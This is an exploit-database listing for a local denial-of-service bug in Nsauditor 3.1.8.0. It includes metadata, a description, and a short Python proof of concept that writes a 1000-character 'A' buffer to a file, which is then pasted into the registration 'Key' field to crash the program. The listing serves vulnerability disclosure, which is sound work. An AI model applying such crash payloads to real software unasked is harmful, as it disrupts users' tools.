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Nsauditor Network Security Auditor
by:
SajjadBnd
7.5
CVSS
HIGH
Denial of Service (DoS)
CWE
Product Name: Nsauditor Network Security Auditor
Affected Version From: 3.1.8.0
Affected Version To: 3.1.8.0
Patch Exists: NO
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Platforms Tested: Windows 10 - Pro
2019

Nsauditor 3.1.8.0 – ‘Key’ Denial of Service (PoC)

This exploit creates a Denial of Service (DoS) attack on Nsauditor version 3.1.8.0. It involves creating a file with a payload that causes the software to crash when the content of the file is pasted into the 'Key' field during registration.

Mitigation:

There is no known mitigation for this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
# Discovery by: SajjadBnd
# Date: 2019-11-30
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.1.8.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro
# Email : blackwolf@post.com

# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks 
# and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise 
# network for all potential methods that a hacker might use to attack it and create a report of potential 
# problems that were found , Nsauditor network auditing software significantly reduces the total cost of 
# network management in enterprise environments by enabling IT personnel and systems administrators gather 
# a wide range of information from all the computers in the network without installing server-side applications 
# on these computers and create a report of potential problems that were found.
 
# POC
# 1.Run the python script, it will create a new file "dos.txt"
# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of dos.txt into the Field: 'Key'
# 6.click 'ok'
# 5.Crashed ;)

#!/usr/bin/env python
 
buffer = "\x41" * 1000
try:
    f=open("dos.txt","w")
    print "[+] Creating %s bytes DOS payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"